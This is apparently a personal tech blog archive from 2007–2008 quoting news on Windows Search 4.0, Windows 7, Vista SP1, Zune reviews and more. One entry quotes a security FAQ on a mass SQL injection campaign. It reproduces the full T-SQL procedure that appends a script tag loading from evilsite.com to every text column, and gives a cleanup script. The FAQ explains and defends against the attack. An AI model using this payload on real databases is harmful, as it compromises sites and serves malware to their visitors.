IT Pros can deploy a new link that will be added to the Instant Search UI of Windows Vista (or Windows Search UI on Windows XP) on client PCs and allow the query entered in the search box to access your company's search server, by opening the search UI of the server in your browser and executing the query in it. With this functionality, users get a single launch pad for all of their searches. For more information on how to add customized links into the instant Search UI, click here.

Based on a large amount of customer feedback, we have added support for indexing files encrypted with EFS. Users in an organization can now encrypt files and still be able to search their contents. When running on Windows Vista, they also can get an additional level of data protection by using BitLocker and storing their index on the protected drive.

Today, Windows Search 4.0 can be downloaded for installation (download links from Microsoft Download Center listed above). If you need Windows Search 4.0 deployed in a large organization, you can use System Center Configuration Manager (SCCM) or other infrastructure solutions.

In the future, we will make Windows Search 4.0 available on Windows Update as well. At that time you will be able to install Windows Search 4.0 off the update site directly or deploy it in your organization using WSUS.

Once Windows Search 4.0 becomes available on Windows Update various Windows users will experience the following:

  • Windows XP users will see it as an "optional" update, which requires users to select the update for installation.
  • Users running Windows Vista will see the update as "recommended." By default, recommended updates are installed automatically; however, users can prevent automatic installation of Windows Search 4.0. We will publicly post specific instructions prior to publishing Windows Search 4.0 on Windows Update.
  • On Windows Server 2008, the update will be applicable only if the File Server Role is enabled.

More on the improvements in Windows Search 4.0 can be found here: http://support.microsoft.com/kb/940157.
[/QUOTE]

Source: http://windowsvistablog.com/

| Trackback | # 
 Wednesday, May 28, 2008
Wednesday, May 28, 2008 1:35:51 PM UTC ( EN | multimedia | tech | windows 7 )

[QUOTE]

Bill Gates and Steve Ballmer got on stage at D6 with Walt and Kara to talk... Microsoft, of course. While the company is still being rather coy about Windows 7 -- some have blamed loose lips early on in Vista development for saddling the OS with too high of expectations and making things difficult for developers -- they were nice enough to show off what Ballmer called "the smallest snippet" of Windows 7. The big reveal was multi-touch support, which utilizes technology developed by the Surface team. The taskbar seems to have been reworked a bit, and the demo was running live on a Dell Latitude XT tablet. Apparently Microsoft is reworking the whole user interface with a multitouch experience in mind. Steve reiterated the "three years after Vista" mantra for availability. Not exactly earth-shattering, but we'll take what we can get at this point.


Video: Multi-Touch in Windows 7

 

[/QUOTE]

Source: http://www.engadget.com/

| Trackback | # 
 Tuesday, May 13, 2008
Tuesday, May 13, 2008 9:08:34 AM UTC ( microsoft | tech | windows 7 )

[QUOTE]


According to WWB, new features in Windows 7 include: "redesigned Windows Explorer with 2-panel option, FTP/SFTP locations, a common folder with keyboard shortcuts, screen and animation capture, and an automated website / blog designer."

[/QUOTE]

Source: WWB via www.techeblog.com

| Trackback | # 
 Wednesday, April 30, 2008
Wednesday, April 30, 2008 11:09:41 AM UTC ( EN | internet | security | tech )

[QUOTE]
Reports about the massive infection of web sites by an automated tool, whose most recent prominent victims have been United Nations, UK Government and the U.S. Department of Homeland Security raised some recurring questions which are worth answering.

  1. The attack is targeting Microsoft IIS web servers. Is there a Microsoft vulnerability?
  2. What can I do if I’m the administrator of an infected site?
  3. What should I do as an user to protect myself?
  4. How can NoScript protect if the compromised sites are in my trusted whitelist?
 


“Exploits of a Mom” by xkcd

  1. The attack is targeting Microsoft IIS web servers. Is it exploiting a Microsoft vulnerability?

    Yes and no. Web developers (or their employers who did not mandate proper security education) are to blame for each single infection, because the SQL injection exploited to infect the web sites is possible thanks to trivial coding errors.
    That said, the attackers are targeting IIS web servers which run ASP for a reason.
    Crackers put together a clever SQL procedure capable of polluting any Microsoft SQL Server database in a generic way, with no need of knowing the specific table and fields layouts:

    DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR
    FOR select a.name,b.name from sysobjects a,syscolumns b where
    a.id=b.id and a.xtype='u' and
    (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
    OPEN
    Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
    WHILE(@@FETCH_STATUS=0) BEGIN
    exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+
    ''<script src=http://evilsite.com/1.js></script>''')
    FETCH NEXT FROM Table_Cursor INTO @T,@C
    END
    CLOSE Table_Cursor
    DEALLOCATE Table_Cursor;

    This is the “secret sauce” which is allowing the attack to reach its impressive numbers, and it works exclusively against Microsoft database technology — but it’s a feature, not a bug (no irony intended this time). Anyway, the chances for such “powerful” DB technology of being used in conjunction with web servers different than IIS are very low.
    So, to recap:

    1. There’s no Microsoft-specific vulnerability involved: SQL injections can happpen (and do happen) on LAMP and other web application stacks as well.
    2. SQL injections, and therefore these infections, are caused by poor coding practices during web site development.
    3. Nonetheless, this mass automated epidemic is due to specific features of Microsoft databases, allowing the exploit code to be generic, rather than tailored for each single web site. Update: more details in this comment.

    In my previous coverage of similar incidents I also assumed a statistical/demographic reason for targeting IIS, since many ASP developers having a desktop Visual Basic background underwent a pretty traumatic migration to the web in the late 90s, and often didn’t really grow enough security awareness to develop safe internet-facing applications.

  2. What should I do if I’m the administrator of an infected site?

    First of all, you should call your web developers (or even better, someone who specializes in web application security) and require a full code review to find and fix the SQL injection bugs.
    In the meanwhile you should either put your database offline or recover clean data from a backup, but until the code review is done be prepared to get compromised again. Deploying a web application firewall may mitigate the emergency, but you must understood it’s a merely temporary work-around — the solution is fixing the code (learn from the United Nations tale).
    If you’ve got no clean database backup, you could try to recover by brutally reversing the SQL attack:

    DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR
    FOR select a.name,b.name from sysobjects a,syscolumns b where
    a.id=b.id and a.xtype='u' and
    (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
    OPEN
    Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
    WHILE(@@FETCH_STATUS=0) BEGIN
    exec('update ['+@T+'] set ['+@C+']=reverse(right(reverse(['+@C+']),
    patindex(''%tpircs<%'', reverse(['+@C+']))+7))
    where ['+@C+'] like ''<script%</script>''')
    FETCH NEXT FROM Table_Cursor INTO @T,@C
    END
    CLOSE Table_Cursor
    DEALLOCATE Table_Cursor;

    This SQL procedure walks through your tables and fields, just like its evil prototype, but rather than appending the malicious JavaScript with

    exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+
    ''<script src=http://evilsite.com/1.js></script>''')

    it locates and removes it with

    exec('update ['+@T+'] set ['+@C+']=reverse(right(reverse(['+@C+']),
    patindex(''%tpircs<%'', reverse(['+@C+']))+7))
    where ['+@C+'] like ''<script%</script>''')

    Notice that I’ve not tested my code above, and I’m just providing it as a courtesy: use it at your own risk, after doing a backup of your data.

  3. What should I do as an user to protect myself?

    OK, this one is the easiest :)

  4. How can NoScript protect if the compromised sites are in my trusted whitelist?

    Even if the compromised site is in your whitelist, allowed to run JavaScript, the malicious scripts are hosted on external servers controlled by the attackers (e.g. www.nihaorr1.com): therefore NoScript prevents them from being loaded and effectively defeats the attack.

[/QUOTE]

Source: http://hackademix.net/2008/04/26/mass-attack-faq/

| Trackback | # 
 Thursday, March 20, 2008
Thursday, March 20, 2008 10:20:58 AM UTC ( EN | tech )

[QUOTE]

A number of credit card companies now issue credit cards with embedded RFIDs (radio frequency ID tags), with promises of enhanced security and speedy transactions.

But on today's episode of Boing Boing tv, hacker and inventor Pablos Holman shows Xeni how you can use about $8 worth of gear bought on eBay to read personal data from those credit cards -- cardholder name, credit card number, and whatever else your bank embeds in this manner.

Fears over data leaks from RFID-enabled cards aren't new, and some argue they're overblown -- but this demo shows just how cheap and easy the "sniffing" can be.

This episode is part of our ongoing series of interviews with some of the thinkers, hackers, and tinkerers at the O'Reilly Emerging Technology conference this year.
[/QUOTE]

Source: tv.boingboing.net (incl. discussion and downloadable video)

| Trackback | # 
 Friday, February 08, 2008
Friday, February 08, 2008 12:04:13 PM UTC ( Apple | EN | linux | microsoft | tech )

[QUOTE]

[...]
Q: What do you think about the regular hype about the release of a new version of Microsoft Windows or Apple OS X?

A: An o/s should never have been something that people (in general) really care about: it should be completely invisible and nobody should give a flying f*** about it except the technical people.

It's stupid - when you make a big deal about something like Vista or Leopard a lot of it is about things I don't consider to be the operating system. It's about the visual shell around it. The fact Microsoft tied the two together so much actually caused them problems, not just the legal problems. If you manage a thousand clients, or a hundred thousand

clients which is not at all unheard of, you sure as hell don't want to point and click at them. In many ways Microsoft has had to fix the design mistakes they made when they thought the graphical approach should be a very intimate part of (Windows).

To Microsoft and Apple the o/s is important as a way to control the whole environment, from a marketing and money-making standpoint, to force people to upgrade their applications, and your hardware.

Q. Do you have a favourite between Leopard and Vista?

A: I don't think they're equally flawed. I think Leopard is a much better system. On the other hand, (I've found) OS X in some ways is actually worse than Windows to program for. Their file system is complete and utter crap, which is scary. I think OS X is nicer than Windows in many ways, but neither can hold a candle to my own (Linux). It's a race to second

place!
[...]

[/QUOTE]

Source: http://www.smh.com.au/

| Trackback | # 
 Thursday, February 07, 2008
Thursday, February 07, 2008 6:49:06 PM UTC ( EN | microsoft | tech | vista )

[QUOTE]
One of the “big” features discussed in early speculation of Windows Vista SP1 was the kernel upgrade, which was supposed to bring the operating system into line with the Longhorn kernel used in Windows Server 2008. And yet with Vista SP1 going RTM, there hasn't been so much as a peep from Microsoft about the mooted kernel update. Has it happened?

Well the answer is yes it has, and presumably the main reason for Microsoft’s silence on the subject is that as they’re keen to promote the improvements and enhancements to Vista, rather than placing emphasis on a kernel upgrade, which some people might see as a risk of newly-introduced instability.

The whole thing is still quite interesting. You can tell what build of Windows you’re running by a variety of means:

  • if you open a Command Window it will immediately tell you what version you have
  • or go Start --> Run --> winver
  • or check out the properties of C:\Windows\System32\NTOSKRNL
  • or open Regedit and navigate to HKLM\Software\Microsoft\Windows NT\Current Version.

All these methods will give you an idea of what version and build of Windows you’re running, although the last two give more detailed information.

Build info - Vista SP1 RTM
Build info - Vista SP1 RTM

Build info - Server 2008 RTM
Build info - Server 2008 RTM

The version and build information of Windows Vista SP1 and Windows Server 2008 (RTM) are exactly the same as each other. And yes, Vista's kernel has been replaced. Windows Vista pre-SP1 is Windows version 6.0 build 6000 (6.0.6000) whereas Windows Vista SP1 RTM is version 6.0 build 6001 (6.0.6001) – the same as Server 2008.

Don't ask me how I know what's in the RTM versions of Server 2008 and Vista SP1. (Zip it ... I said, don't ask me.)

Interestingly, if you do a winver on Server 2008, you’ll see that the version information is actually version 6.0 build 6001 Service Pack 1. No, it’s not Server 2008 Service Pack 1, but rather Service Pack 1 of the original Longhorn code (Windows 6.0).

So if you look at it one way, the Windows Vista “kernel upgrade” isn’t a fundamental update, but rather, an alignment of the two operating systems. In some ways, both can be said to be running Windows Vista SP1, which is interesting in a seriously geeky sort of way.

Windows Server 2008 WINVER
Windows Server 2008 WINVER

Still, makes you realise just how long SP1 code has been in the pipeline...
[/QUOTE]

Source: http://apcmag.com/

Related stories:

| Trackback | # 
 Monday, January 28, 2008
Monday, January 28, 2008 8:36:09 PM UTC ( EN | microsoft | tech | vista )

[QUOTE]
Microsoft released yet more test builds of both Windows XP Service Pack (SP) 3 and Windows Vista SP1 this week.

Microsoft made the newest test build of XP SP3, which it is calling XP SP3 Release Candidate (RC) Refresh 2, available to 15,000 testers on January 23, Microsoft officials said. It also released a new refresh of its Vista SP1 build, known as Vista SP1 RC Refresh 2, to the same 15,000 testers on January 24, execs said.

Microsoft made both builds available via its private Connect test site.

Microsoft released privately and then publicly an RC test build of Vista SP1 just a couple of weeks ago. The company released a public RC test build of XP SP3 in December 2007.

Microsoft has said the final version of Windows Vista SP1 is due to ship in the first quarter of 2008, and the final XP SP3 some time in the first half of this year. Microsoft has been delivering both private and public test builds of both service packs on a regular basis over the past few months.

The test group for both service packs includes “corporate customers, consumer enthusiasts, software and hardware vendors, and others,” Microsoft reiterated. However, neither of these new builds are available for public download — at least not right now.

Earlier this week, there were some reports floating claiming that Microsoft is planning to deliver the final Vista SP1 bits on February 15. I hear the delivery date might be sooner than that and could even sync up with the release to manufacturing (RTM) of Windows Server 2008, which sources say is could happen in the first week of February. Guess we’ll see soon….
Microsoft officials reiterated during the company’s Q2 FY 2008 earnings call on January 24 that the first Vista SP, a release awaited by many business users before they will deploy the latest Windows release, is on track for delivery in the first quarter of 2008.

So if you’re one of the chosen 15,000 testers, there are new SPs out there with your names on them. Any of you seeing any showstoppers in either Vista SP1 or XP SP3, at this point?
[/QUOTE]

Found on: http://blogs.zdnet.com/

| Trackback | # 
 Monday, January 21, 2008
Monday, January 21, 2008 10:46:57 AM UTC ( EN | science | tech )

[QUOTE]
Movie characters from the Terminator to the Bionic Woman use bionic eyes to zoom in on far-off scenes, have useful facts pop into their field of view, or create virtual crosshairs. Off the screen, virtual displays have been proposed for more practical purposes -- visual aids to help vision-impaired people, holographic driving control panels and even as a way to surf the Web on the go.


Contact lenses with metal connectors for electronic circuits were safely worn by rabbits in lab tests.

The device to make this happen may be familiar. Engineers at the University of Washington have for the first time used manufacturing techniques at microscopic scales to combine a flexible, biologically safe contact lens with an imprinted electronic circuit and lights.

"Looking through a completed lens, you would see what the display is generating superimposed on the world outside," said Babak Parviz, a UW assistant professor of electrical engineering. "This is a very small step toward that goal, but I think it's extremely promising." The results were presented today at the Institute of Electrical and Electronics Engineers' international conference on Micro Electro Mechanical Systems by Harvey Ho, a former graduate student of Parviz's now working at Sandia National Laboratories in Livermore, Calif. Other co-authors are Ehsan Saeedi and Samuel Kim in the UW's electrical engineering department and Tueng Shen in the UW Medical Center's ophthalmology department.

There are many possible uses for virtual displays. Drivers or pilots could see a vehicle's speed projected onto the windshield. Video-game companies could use the contact lenses to completely immerse players in a virtual world without restricting their range of motion. And for communications, people on the go could surf the Internet on a midair virtual display screen that only they would be able to see.

"People may find all sorts of applications for it that we have not thought about. Our goal is to demonstrate the basic technology and make sure it works and that it's safe," said Parviz, who heads a multi-disciplinary UW group that is developing electronics for contact lenses.


A researcher holds one of the completed lenses.

The prototype device contains an electric circuit as well as red light-emitting diodes for a display, though it does not yet light up. The lenses were tested on rabbits for up to 20 minutes and the animals showed no adverse effects.

Ideally, installing or removing the bionic eye would be as easy as popping a contact lens in or out, and once installed the wearer would barely know the gadget was there, Parviz said.

Building the lenses was a challenge because materials that are safe for use in the body, such as the flexible organic materials used in contact lenses, are delicate. Manufacturing electrical circuits, however, involves inorganic materials, scorching temperatures and toxic chemicals. Researchers built the circuits from layers of metal only a few nanometers thick, about one thousandth the width of a human hair, and constructed light-emitting diodes one third of a millimeter across. They then sprinkled the grayish powder of electrical components onto a sheet of flexible plastic. The shape of each tiny component dictates which piece it can attach to, a microfabrication technique known as self-assembly. Capillary forces -- the same type of forces that make water move up a plant's roots, and that cause the edge of a glass of water to curve upward -- pull the pieces into position.

The prototype contact lens does not correct the wearer's vision, but the technique could be used on a corrective lens, Parviz said. And all the gadgetry won't obstruct a person's view.

"There is a large area outside of the transparent part of the eye that we can use for placing instrumentation," Parviz said. Future improvements will add wireless communication to and from the lens. The researchers hope to power the whole system using a combination of radio-frequency power and solar cells placed on the lens, Parviz said.

A full-fledged display won't be available for a while, but a version that has a basic display with just a few pixels could be operational "fairly quickly," according to Parviz.

The research was funded by the National Science Foundation and a Technology Gap Innovation Fund from the University of Washington.
[/QUOTE]

Source: http://uwnews.washington.edu/

| Trackback | # 
 Wednesday, January 02, 2008
Wednesday, January 02, 2008 9:13:29 PM UTC ( EN | markets | tech )

[QUOTE]
The downside [of 2007] is that it was also full of disappointments large and small, from new memory technologies to nearly-broken operating systems (and we're not talking about Windows Vista). 2007 saw some hotly-awaited technologies sputter; they failed to live up to their lofty potential. That's not to say they never will; they just didn't by the end of this year.

10. DDR3
9. The VoIP Revolution
8. Safari for Windows
7. Mac OS X Leopard
6. Tech Piling Up in Landfills
5. The Never Ending Format War
4. DirectX 10
3. Games for Windows Live
2. AMD's CPU Lineup
1. Gaming as the Universal Boogieman

[/QUOTE]

Source: extremetech.com (2 pages)

| Trackback | # 
 Tuesday, December 18, 2007
Tuesday, December 18, 2007 2:33:55 PM UTC ( EN | microsoft | mobile | tech )

[QUOTE]
Windows Mobile, like Windows itself, has had a checkered history. Early versions were maligned as being feature-poor and difficult to use. However, in a tale familiar to anyone who has followed Microsoft, the company stuck at it, and the portable operating system started to come into its own. The most recent release, Windows Mobile 6.0, added Vista-like themes to go along with a significant upgrade to the OS internals. Having conquered Palm in the dying PDA market, Windows Mobile was now ready to go toe-to-toe with other phone operating systems and platforms such as BlackBerry, Symbian and various Linux derivatives.

All seemed well in Windows Mobile land, but then Apple released the iPhone running a stripped-down version of OS X and a new multitouch user interface. Despite Steve Ballmer's prediction that the phone had "no chance" of gaining significant market share, a recent survey by Net Applications showed the iPhone actually overtaking Windows Mobile in web browsing share: 0.09 percent for the iPhone versus 0.06 percent for all Windows CE and Mobile devices put together. All of a sudden Windows Mobile phones seemed like they were stuck in the past, and minor UI annoyances stuck out like a sore thumb.

Windows Mobile 6.1
Windows Mobile 6.1.

Never one to back down from a challenge, Microsoft is busily preparing both a minor UI refresh (Windows Mobile 6.1) and a major new release of the operating system (Windows Mobile 7.0). A gallery of screen shots from the 6.1 refresh compiled by Boy Genius shows an emphasis on simplification: the screens are more task-oriented and have less clutter than their immediate predecessor. A new and clearer font adorns the UI, and new features such as zooming, copy and paste in Internet Explorer, and auto-configuring ActiveSync for e-mails are sure to be welcome additions to the platform. In addition, Microsoft is making it easier (and more Windows-like) to switch tasks by adding a standardized task manager to the platform.

As far as Windows Mobile 7.0 goes, there are no leaked screen shots as of yet, but big changes are afoot. Microsoft plans to completely redo applications such as Internet Explorer, bringing the mobile browser up to par with Apple's Mobile Safari. The e-mail and SMS applications are also scheduled for complete rewrites. Microsoft plans to make the user interface even more consumer-friendly.

Beyond 7.0, Microsoft is even hinting at a completely redesigned Windows Mobile 8.0, which will again redo the internals of the operating system to keep up with newer and more powerful mobile hardware. Details for this release are scarce, although Microsoft promises features such as being able to go from a person's address in their contact info directly to a map view with directions to where they live. It all sounds like the iPhone really lit a fire under the posteriors of the Windows Mobile team, and that can only be good news for smartphone users.
[/QUOTE]

Source: http://arstechnica.com
Further reading:
  • Gizmodo has an in-depth interview with a couple of members of the Windows Mobile dev team, discussing what they believe is wrong with Windows Mobile 6 and how they plan to fix it
  • Microsoft may have iPhone on the brain as it works on future versions of Windows Mobile, but CEO Steve Ballmer isn't too concerned about Google's Android platform.
  • Windows Mobile 6 was released last February. Reread our impressions of it as you look ahead to Windows Mobile 6.1 and 7.0
Related Stories:
| Trackback | # 
 Monday, December 17, 2007
Monday, December 17, 2007 12:07:55 PM UTC ( coding | EN | microsoft | tech | xbox )

[QUOTE]
New XNA Game Studio 2.0 From Microsoft Enables Creation of Online Multiplayer Games Using LIVE
Microsoft Corp. today marked the next step in its initiative to democratize game development and unleash the creativity of the community with the release of the XNA Game Studio 2.0, the next generation of the popular game development platform for Xbox 360 and Windows. The new version builds upon XNA Game Studio Express, released one year ago, and includes the ability to create online, cross-platform multiplayer games for Xbox 360 and Windows using Xbox LIVE and Games for Windows -- LIVE, respectively. XNA Game Studio 2.0 adds more than 15 new features and is available for download from http://creators.xna.com.

"When building XNA Game Studio 2.0, we wanted to offer everyone the opportunity to utilize the rich gaming environment of LIVE used by AAA developers for titles such as 'Halo 3' and 'Gears of War,'" said Chris Satchell, general manager of the XNA organization at Microsoft. "We accomplished our goal with this new toolset, and, best of all, it remains highly accessible to students, hobbyists and pros alike." Many of LIVE's best features are supported by XNA Game Studio 2.0 with minimal to no coding necessary to activate them -- features like matchmaking, which uses LIVE to find the best games for you to play based on your location and internet connection. Additionally, XNA Game Studio 2.0 fully supports game development with all versions of the Microsoft Visual Studio product line.

XNA Creators Club Academic Trial Memberships Now Free to Qualified Students and Faculty
Since its release last December, XNA Game Studio has been an incredible success, with 750,000 downloads, adoption by more than 300 universities worldwide and at least nine textbooks on the tools in development. In subjects from computer science to fine arts, introductory courses to graduate and research projects -- XNA Game Studio is helping faculty members and students explore the boundaries of applied gaming technology in education. Along with XNA Game Studio 2.0, Microsoft will also provide a free academic trial membership in the XNA Creators Club beginning in January, allowing faculty members and students to use XNA Game Studio 2.0 and Xbox 360 for instructional purposes.

Time to Dream-Build-Play Again
From more than 4,500 entrants from around the world, four community games were awarded Xbox LIVE Arcade publishing contracts in this year's Dream-Build-Play game development competition. Microsoft will once again challenge aspiring game developers to create their dream games for a chance to win more coveted publishing contracts. This week Microsoft kicks off registration for Dream-Build-Play 2008 with the Silicon Minds Warm-Up Challenge. Registration begins on Dec. 14 and winners will be announced at the Game Developers Conference where details of the main challenge will be announced. Run in partnership with Microsoft Research's Machine Learning Group in Cambridge, England; Rare Ltd.; and Lionhead Studios, prizes for the Warm-Up Challenge will include the once-in-a-lifetime opportunity to interview for an internship with one of those organizations.

"Artificial intelligence is so important to the games we make at Lionhead Studios, and we are very excited to see what the community can come up with in this Warm-Up Challenge to Dream-Build-Play 2008," said Peter Molyneux, managing director at Lionhead Studios. "We are always on the lookout for the best talent and believe that XNA Game Studio 2.0 will be a great platform for contestants to showcase their skills on." More information about Dream-Build-Play 2008 is available at http://www.dreambuildplay.com.
[/QUOTE]

Official Site/Download: http://creators.xna.com

| Trackback | # 
 Monday, November 26, 2007
Monday, November 26, 2007 2:28:02 PM UTC ( EN | microsoft | tech | Zune )

zc3.jpg

[QUOTE]
The $249 Zune 80 is Microsoft's latest attempt to kick the iPod in the nuts, praying to crack Jobs' titanium-diamond alloy cup through Wi-Fi features and a touch of divine intervention. CNET, Wired, Dean Takahashi, PCWorld and YahooTech struck first with reviews on the new device. Their verdicts? The cup has not yet been breeched, but Microsoft is making very solid improvements on the brand.

PCMag
We'll just come out and say it: The 80GB Zune trumps the iPod Classic...For the same $250 price as the 80GB iPod classic, the new Zune 80GB offers a much larger screen, FM radio, wireless player-to-player sharing, Wi-Fi syncing with your PC, and a rear panel that can be customized with some cool artwork--for free. Simply put, Apple is no longer the leader in the realm of hard drive-based players. While the Zune 80GB and the iPod classic are both outstanding devices, the Zune has more features--and it's more fun.

CNET
The 80GB Zune cuts a much slimmer figure than its bricklike older brother. Measuring 4.3 inches high by 2.4 inches wide by 0.5 inch deep, Microsoft shaved some considerable bulk off the Zune's thickness, while nearly tripling its capacity...we believe the latest crop of Zunes should finally take hold as a true iPod alternative. (83/100)

PCWorld
All of the new Zunes are built around a rounded touch-sensitive control that also doubles as a clickable d-pad-style controler, much like the Click Wheel on Apple's iPods. Flick your thumb up or down the pad repeatedly, and you begin to build up momentum while scrolling through long lists. At any time, you can tap to stop the scrolling, though it will eventually come to stop naturally. In my experience, it's a very fun way to navigate through a music collection, even in a long view of artists on the 80GB player...All in all, the 80GB Zune is a decent choice as an 80GB MP3 player. (no score at this time)

Wired
Video performance is very good, with the screen size really helping...Battery life didn't meet the published specs of 20 hours for music and 4 hours for video with the Wi-Fi turned off. My rundown test on music was 18 hours, and video was 3.5 hours, which is, you know, fine.... Would I recommend the Zune? Yeah, I think I would. If you're not invested in the iPod/iTunes ecosystem, it's the most polished competitor I've used to date. Especially if you're looking for a subscription service, the integration of player and service just crushes everyone else. (6/10)

YahooTech

...the most innovative new feature on the Zune: wireless syncing. Setup was a piece of cake: you just connect the Zune to your PC via USB, fire up the Zune software, and enable wireless syncing under the Settings menu. If your system is already connected to a wireless network, those settings are transferred to the Zune automatically—no need to key in the access point name or password...automatic syncing only works when the Zune is plugged into its charging dock. Overall, I thought wireless syncing worked pretty seamlessly, and I loved being able to sync new songs and playlists over the air (why can't the iPhone or the iPod Touch do this?)

Dean Takahashi
The Zune Marketplace website looks better than iTunes because it feels less like a spreadsheet. It still uses the MTV Urge back-end but is completely redesigned.... All of these things represent improvements that allow Microsoft to claim that it is going its own way. Clearly, they aren't copying Apple...At this rate of improvement, Microsoft will be a contender. But it has a long way to go before it keeps Steve Jobs up at night.

- Zune fans should be happy with the improvements, but even more, that the big new features are software based and free for everyone.
[/QUOTE]

Source: http://gizmodo.com/

| Trackback | # 
 Friday, November 16, 2007
Friday, November 16, 2007 9:23:50 AM UTC ( EN | microsoft | tech )

PocketInfo.NL reports that they have information from a reliable source than a new interface for WM 6.1 will be introduced at 3GSM next year, with devices shipping in May 2008. The new interface will be based on the same principle as Windows Media Centre, with a vertically scrolling list and horizontal options. One can only hope the cool WMC eye candy also makes it onto the mobile platform, as well as an improved media player for WM (Zune-like?)An early preview would be the Vodafone carousel as found in the Treo 500v, which was created in a partnership with Vodafone and Microsoft.

Wm61

There will apparently be further improvements in WIFI functionality (squiring?) and Bluetooth pairing, and improvements in Exchange 2007 integration.

Its clear that if Microsoft wants to compete with Apple in the consumer space they need to up the eye candy. Here’s hoping they do a good job without gimping the power of the OS.

| Trackback | # 
 Monday, November 05, 2007
Monday, November 05, 2007 6:56:17 PM UTC ( EN | markets | microsoft | tech )

[QUOTE]
Two closely timed events—today's release of Mac OS X Leopard and yesterday's big Microsoft earnings report—raise questions yet again about how Microsoft and Apple are perceived.

Apple it seems can do no wrong, while Microsoft can do no right. If someone passes gas in the room, someone blames Microsoft. Yet Apple can "brick" iPhones for which customers paid $400 to $600 and sales just soar.

Microsoft reports solid earnings quarter after quarter—and yesterday beat earnings estimates by more than $1 billion. Yet Microsoft's stock price is stuck at 2001 levels. Apple earnings results are good, but nowhere near what Microsoft delivers. Yet Apple's stock just climbs and climbs—this morning to more than $185 a share, up from about 77 bucks 52 weeks earlier.

A decade ago, things were different. Following the release of Windows 95, Microsoft could do no wrong. The company got huge preferential press treatment. I recall the week that Corel released the first new version of WordPerfect Suite since the acquisition from Novell. Microsoft talked up the unreleased Office 97, which got the majority of the press coverage.

By contrast, Apple was perceived as gasping for air, as being an also-ran. During the Gartner Symposium in October 1997, Dell CEO Michael Dell said how he would solve the Apple problem: "What would I do? I'd shut it down and give the money back to the shareholders." A decade later, Apple's market capitalization is about two-and-a-half times Dell's.

Apple's success is one of perception, spurred on by some very smart marketing and branding decisions made over the past six years. Apple is a cool brand that people want to be associated with. When people really like something, they also tend to be more forgiving of faults.

By contrast, Microsoft has huge perceptions problems, many of its own making. For years, Microsoft rushed OK products to market, leading to a popular (and usually right) perception that the company wouldn't get it right until the third release. Marketing 101: The products are the company, and its image. I hear people complain about buggy, crashy Windows, years after Microsoft released the very stable and reliable XP and, later, its Service Pack 2 update; the days of perennial crashes are long gone, but not forgotten.

Microsoft's past behavior has created some perception that its products aren't good enough, that the company doesn't care for customers. Windows Vista is a poster product for Microsoft's perception problems: It's got an undeserved bad reputation.

Perhaps a good analogy for comparing perceptions about Apple and Microsoft is to look at Beatles leaders John Lennon and Paul McCartney. Lennon could do no wrong, even when he really did no right (other than the Beatles being greater than Jesus fiasco). Lennon had a reputation for being a man of the people, a champion of peace and love.

But what did he really do? Lennon's idea of peace: sleep-ins and singing a song about peace for which he made millions. Lennon later lived in a posh apartment off Central Park, far removed "the people." By contrast, the more conservative (an arguably more boring) McCartney did more and toured more. His song, "Hey Jude," was written for Lennon's son Julian, who was essentially ostracized from his father after the Yoko Ono affair. Lennon was perceived to be the better Beatle, but McCartney showed more character, and he is the better songwriter.

Perception often isn't reality.

This week, a number of tech journalists gave glowing reviews of Leopard. They received the software on Mac Book Pro laptops provided by Apple. Nowhere have I seen anyone gripe about conflicts of interest. But when Microsoft's PR agency sent bloggers preloaded Vista notebooks ahead of the operating system's launch, there were ridiculous accusations of attempted bribery. The accusations made it difficult for those receiving the Vista units to say anything positive about the operating system.

Yesterday, I casually spoke (nothing through official channels) with a developer from PlantCML, which provided the reverse-911 system used to warn people in San Diego County to evacuate; wildfires ravaged the county this week. He praised Microsoft, which provided technicians throughout the weekend as PlantCML prepared for impending trouble. It's that kind of behind-the-scene support and service to partners for which Microsoft delivers but doesn't get enough credit.

Contrast Microsoft to Apple, which has a reputation for secrecy and being partner unfriendly. Apple's nearly 200 retail stores compete with loyal dealers and resellers. For years I've heard developers complain about Apple information disclosure; iPhone is the most recent example. Apple's move to Intel processors forced its two largest development partners, Adobe and Microsoft, to switch development tools and do massive recoding to port software.

Apple is perceived to be a progressive company. But it has a spotty record for green computing—even though one of its board members just won a Nobel prize for environmental work. Its record of giving is OK, but not exceptional. Apple has few programs (actually none that I know of) for helping people in emerging markets. Oh, but it's cool, though, and has style.

By contrast, Microsoft's focus for years has been the conversion to digital documents, which is hugely environmentally friendly. The company's chairman is trustee for a charitable organization with billions of dollars to give away. Microsoft's Unlimited Potential program seeks to use technology to empower people in emerging markets.

There's perception, and there's reality.

No question, Microsoft makes lots of boneheaded decisions, for which it is rightly vilified. But the company also deserves more praise than it gets. Meanwhile, strong brand perceptions—and their feel good association—lets Apple off even when it screws up.

Today will be no exception. The blogosphere will praise Leopard as the next best thing ever and use it as more proof why Vista sucks (It doesn't). Meanwhile, there will be little good said about Microsoft's colossal 2008 fiscal first quarter results. Those people acknowledging the earnings results will blame Microsoft for trying to kill Linux and babies in Africa as reasons for its success. The perception: When Microsoft competes, it cheats.

There is a double standard.
[/QUOTE]

Source: http://www.microsoft-watch.com

| Trackback | # 
 Thursday, October 11, 2007
Thursday, October 11, 2007 9:31:03 PM UTC ( EN | microsoft | tech | vista )

[QUOTE]
The principal reason given for the tremendous under-the-hood changes to Windows unveiled early this year in Vista was the need to overhaul the security model. Indeed, Vista has proven to be a generally more secure operating system, though some vulnerabilities that apply to ordinary software impact Vista users just as much as any other.

But now, software analysts testing the latest build 3205 of the beta for Windows XP Service Pack 3 are discovering a wealth of genuinely new features - not just patches and security updates (although there are literally over a thousand of those), but services that could substantially improve system security without overhauling the kernel like in Vista.

According to preliminary reports from Neosmart, testers there found evidence that the company is hardening XP's network security with added features.

One of these features had actually been on Microsoft's list for some time, and might actually have caused problems for customers had it been omitted: Network Access Protection (NAP), which is due to be managed by the forthcoming Windows Server 2008. This new service disallows network clients from accessing a WS2K8 server without passing a minimum "health screening," which checks for the presence of updates and service packs (including SP3) and disallows access to failing clients until they upgrade.

